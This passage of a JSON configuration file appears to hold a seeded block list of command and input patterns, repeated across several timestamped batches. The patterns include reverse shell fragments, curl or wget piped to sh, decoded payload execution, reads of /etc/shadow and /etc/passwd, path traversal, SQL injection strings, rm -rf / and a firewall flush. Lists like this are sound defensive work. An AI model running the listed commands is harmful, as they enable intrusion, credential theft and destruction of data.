"2026-03-19T22:43:15.187259212Z" }, { "type": "contains", "value": "crontab -e", "source": "seeded", "reason": "Cron job modification", "created_at": "2026-03-19T22:43:15.18725933Z" }, { "type": "contains", "value": "iptables -F", "source": "seeded", "reason": "Firewall flush", "created_at": "2026-03-19T22:43:15.187262186Z" }, { "type": "contains", "value": "rm -rf /", "source": "seeded", "reason": "Destructive filesystem command", "created_at": "2026-03-19T22:48:52.970239615Z" }, { "type": "contains", "value": "chmod 777", "source": "seeded", "reason": "Overly permissive file permissions", "created_at": "2026-03-19T22:48:52.970240181Z" }, { "type": "contains", "value": "/etc/shadow", "source": "seeded", "reason": "Shadow password file access", "created_at": "2026-03-19T22:48:52.970240311Z" }, { "type": "contains", "value": "/etc/passwd", "source": "seeded", "reason": "Password file access", "created_at": "2026-03-19T22:48:52.970240451Z" }, { "type": "contains", "value": "reverse shell", "source": "seeded", "reason": "Reverse shell keyword", "created_at": "2026-03-19T22:48:52.970240575Z" }, { "type": "contains", "value": "nc -e /bin/sh", "source": "seeded", "reason": "Netcat reverse shell", "created_at": "2026-03-19T22:48:52.970240705Z" }, { "type": "contains", "value": "bash -i \u003e\u0026 /dev/tcp", "source": "seeded", "reason": "Bash reverse shell", "created_at": "2026-03-19T22:48:52.970240827Z" }, { "type": "contains", "value": "curl | sh", "source": "seeded", "reason": "Remote code execution via curl pipe", "created_at": "2026-03-19T22:48:52.970240946Z" }, { "type": "contains", "value": "wget | sh", "source": "seeded", "reason": "Remote code execution via wget pipe", "created_at": "2026-03-19T22:48:52.970241187Z" }, { "type": "contains", "value": "base64 -d | bash", "source": "seeded", "reason": "Encoded command execution", "created_at": "2026-03-19T22:48:52.97024131Z" }, { "type": "contains", "value": "python -c 'import socket", "source": "seeded", "reason": "Python reverse shell", "created_at": "2026-03-19T22:48:52.970241427Z" }, { "type": "contains", "value": "perl -e 'use Socket", "source": "seeded", "reason": "Perl reverse shell", "created_at": "2026-03-19T22:48:52.970241546Z" }, { "type": "contains", "value": "phpinfo()", "source": "seeded", "reason": "PHP information disclosure", "created_at": "2026-03-19T22:48:52.970241683Z" }, { "type": "contains", "value": "../../etc/passwd", "source": "seeded", "reason": "Path traversal attack", "created_at": "2026-03-19T22:48:52.970241808Z" }, { "type": "contains", "value": "UNION SELECT", "source": "seeded", "reason": "SQL injection", "created_at": "2026-03-19T22:48:52.970241925Z" }, { "type": "contains", "value": "DROP TABLE", "source": "seeded", "reason": "SQL injection / destructive query", "created_at": "2026-03-19T22:48:52.970242043Z" }, { "type": "contains", "value": "; ls -la", "source": "seeded", "reason": "Command injection", "created_at": "2026-03-19T22:48:52.970242318Z" }, { "type": "contains", "value": "\u0026\u0026 cat /etc", "source": "seeded", "reason": "Command injection", "created_at": "2026-03-19T22:48:52.970242435Z" }, { "type": "contains", "value": "curl ifconfig.me", "source": "seeded", "reason": "External IP reconnaissance", "created_at": "2026-03-19T22:48:52.970242552Z" }, { "type": "contains", "value": "wget -q -O-", "source": "seeded", "reason": "Stealthy remote download", "created_at": "2026-03-19T22:48:52.97024267Z" }, { "type": "contains", "value": ".bash_history", "source": "seeded", "reason": "History file access", "created_at": "2026-03-19T22:48:52.970242789Z" }, { "type": "contains", "value": "authorized_keys", "source": "seeded", "reason": "SSH key manipulation", "created_at": "2026-03-19T22:48:52.970242906Z" }, { "type": "contains", "value": "crontab -e", "source": "seeded", "reason": "Cron job modification", "created_at": "2026-03-19T22:48:52.970243023Z" }, { "type": "contains", "value": "iptables -F", "source": "seeded", "reason": "Firewall flush", "created_at": "2026-03-19T22:48:52.970243141Z" }, { "type": "contains", "value": "rm -rf /", "source": "seeded", "reason": "Destructive filesystem command", "created_at": "2026-03-19T23:59:00.735511125Z" }, { "type": "contains", "value": "chmod 777", "source": "seeded", "reason": "Overly permissive file permissions", "created_at": "2026-03-19T23:59:00.735511885Z" }, { "type": "contains", "value": "/etc/shadow", "source": "seeded", "reason": "Shadow password file access", "created_at": "2026-03-19T23:59:00.735512087Z" }, { "type": "contains", "value": "/etc/passwd", "source": "seeded", "reason": "Password file access", "created_at": "2026-03-19T23:59:00.735512265Z" }, { "type": "contains", "value": "reverse shell", "source": "seeded", "reason": "Reverse shell keyword", "created_at": "2026-03-19T23:59:00.735512417Z" }, { "type": "contains", "value": "nc -e /bin/sh", "source": "seeded", "reason": "Netcat reverse shell", "created_at": "2026-03-19T23:59:00.735512618Z" }, { "type": "contains", "value": "bash -i \u003e\u0026 /dev/tcp", "source": "seeded", "reason": "Bash reverse shell", "created_at": "2026-03-19T23:59:00.735512801Z" }, { "type": "contains", "value": "curl | sh", "source": "seeded", "reason": "Remote code execution via curl pipe", "created_at": "2026-03-19T23:59:00.735512966Z" }, { "type": "contains", "value": "wget | sh", "source": "seeded", "reason": "Remote code execution via wget pipe", "created_at": "2026-03-19T23:59:00.735513245Z" }, { "type": "contains", "value": "base64 -d | bash", "source": "seeded", "reason": "Encoded command execution", "created_at": "2026-03-19T23:59:00.735513411Z" }, { "type": "contains", "value": "python -c 'import socket", "source": "seeded", "reason": "Python reverse shell", "created_at": "2026-03-19T23:59:00.735513801Z" }, { "type": "contains", "value": "perl -e 'use Socket", "source": "seeded", "reason": "Perl reverse shell", "created_at": "2026-03-19T23:59:00.735513955Z" }, { "type": "contains", "value": "phpinfo()", "source": "seeded", "reason": "PHP information disclosure", "created_at": "2026-03-19T23:59:00.735514109Z" }, { "type": "contains", "value": "../../etc/passwd", "source": "seeded", "reason": "Path traversal attack", "created_at": "2026-03-19T23:59:00.735514288Z" }, { "type": "contains", "value": "UNION SELECT", "source": "seeded", "reason": "SQL injection", "created_at": "2026-03-19T23:59:00.735514471Z" }, { "type": "contains", "value": "DROP TABLE", "source": "seeded", "reason": "SQL injection / destructive query", "created_at": "2026-03-19T23:59:00.735514687Z" }, { "type": "contains", "value": "; ls -la", "source": "seeded", "reason": "Command injection", "created_at": "2026-03-19T23:59:00.735514939Z" }, { "type": "contains", "value": "\u0026\u0026 cat /etc", "source": "seeded", "reason": "Command injection", "created_at": "2026-03-19T23:59:00.735515116Z" }, { "type": "contains", "value": "curl ifconfig.me", "source": "seeded", "reason": "External IP reconnaissance", "created_at": "2026-03-19T23:59:00.735515292Z" }, { "type": "contains", "value": "wget -q -O-", "source": "seeded", "reason": "Stealthy remote download", "created_at": "2026-03-19T23:59:00.735515476Z" }, { "type": "contains", "value": ".bash_history", "source": "seeded", "reason": "History file access", "created_at": "2026-03-19T23:59:00.735515641Z" }, { "type": "contains", "value": "authorized_keys", "source": "seeded", "reason": "SSH key manipulation", "created_at": "2026-03-19T23:59:00.735515784Z" }, { "type": "contains", "value": "crontab -e", "source": "seeded", "reason": "Cron job modification", "created_at": "2026-03-19T23:59:00.735515928Z" }, { "type": "contains", "value": "iptables -F", "source": "seeded", "reason": "Firewall flush", "created_at": "2026-03-19T23:59:00.735516099Z" }, { "type": "contains", "value": "rm -rf /", "source": "seeded", "reason": "Destructive filesystem command", "created_at": "2026-03-20T00:14:31.928245971Z" }, { "type": "contains", "value": "chmod 777", "source": "seeded", "reason": "Overly permissive file permissions", "created_at": "2026-03-20T00:14:31.928246716Z" }, { "type": "contains", "value": "/etc/shadow", "source": "seeded", "reason": "Shadow password file access", "created_at": "2026-03-20T00:14:31.928246884Z" }, { "type": "contains", "value": "/etc/passwd", "source": "seeded", "reason": "Password file access", "created_at": "2026-03-20T00:14:31.928247058Z" }, { "type": "contains", "value": "reverse shell", "source": "seeded", "reason": "Reverse shell keyword", "created_at": "2026-03-20T00:14:31.928247289Z" }, { "type": "contains", "value": "nc -e /bin/sh", "source": "seeded", "reason": "Netcat reverse shell", "created_at": "2026-03-20T00:14:31.928247509Z" }, { "type": "contains", "value": "bash -i \u003e\u0026 /dev/tcp", "source": "seeded", "reason": "Bash reverse shell", "created_at": "2026-03-20T00:14:31.928247694Z" }, { "type": "contains", "value": "curl | sh", "source": "seeded", "reason": "Remote code execution via curl pipe", "created_at": "2026-03-20T00:14:31.928247855Z" }, { "type": "contains", "value": "wget | sh", "source": "seeded", "reason": "Remote code execution via wget pipe", "created_at": "2026-03-20T00:14:31.928247998Z" }, { "type": "contains", "value": "base64 -d | bash", "source": "seeded", "reason": "Encoded command execution", "created_at": "2026-03-20T00:14:31.928248165Z" }, { "type": "contains", "value": "python -c 'import socket", "source": "seeded", "reason": "Python reverse shell", "created_at": "2026-03-20T00:14:31.928248368Z" }, { "type": "contains", "value": "perl -e 'use Socket", "source": "seeded", "reason": "Perl reverse shell", "created_at": "2026-03-20T00:14:31.928254672Z" }, { "type": "contains", "value": "phpinfo()", "source": "seeded", "reason": "PHP information disclosure", "created_at": "2026-03-20T00:14:31.928257801Z" }, { "type": "contains", "value": "../../etc/passwd", "source": "seeded", "reason": "Path traversal attack", "created_at": "2026-03-20T00:14:31.928257979Z" }, { "type": "contains", "value": "UNION SELECT", "source": "seeded", "reason": "SQL injection", "created_at": "2026-03-20T00:14:31.928258151Z" }, { "type": "contains", "value": "DROP TABLE", "source": "seeded", "reason": "SQL injection / destructive query", "created_at": "2026-03-20T00:14:31.928258319Z" }, { "type": "contains", "value": "; ls -la", "source": "seeded", "reason": "Command injection", "created_at": "2026-03-20T00:14:31.928258493Z" }, { "type": "contains", "value": "\u0026\u0026 cat /etc", "source": "seeded", "reason": "Command injection", "created_at": "2026-03-20T00:14:31.928258656Z" }, { "type": "contains", "value": "curl ifconfig.me", "source": "seeded", "reason": "External IP reconnaissance", "created_at": "2026-03-20T00:14:31.928258819Z" }, { "type": "contains", "value": "wget -q -O-", "source": "seeded", "reason": "Stealthy remote download", "created_at": "2026-03-20T00:14:31.928259003Z" }, { "type": "contains", "value": ".bash_history", "source": "seeded", "reason": "History file access", "created_at": "2026-03-20T00:14:31.928259227Z" }, { "type": "contains", "value": "authorized_keys", "source": "seeded", "reason": "SSH key manipulation", "created_at": "2026-03-20T00:14:31.928259372Z" }, { "type": "contains", "value": "crontab -e", "source": "seeded", "reason": "Cron job modification", "created_at": "2026-03-20T00:14:31.928259545Z" }, { "type": "contains", "value": "iptables -F", "source": "seeded", "reason": "Firewall flush", "created_at": "2026-03-20T00:14:31.928259725Z" } ] }, "alert": {}, "suppress": {} } }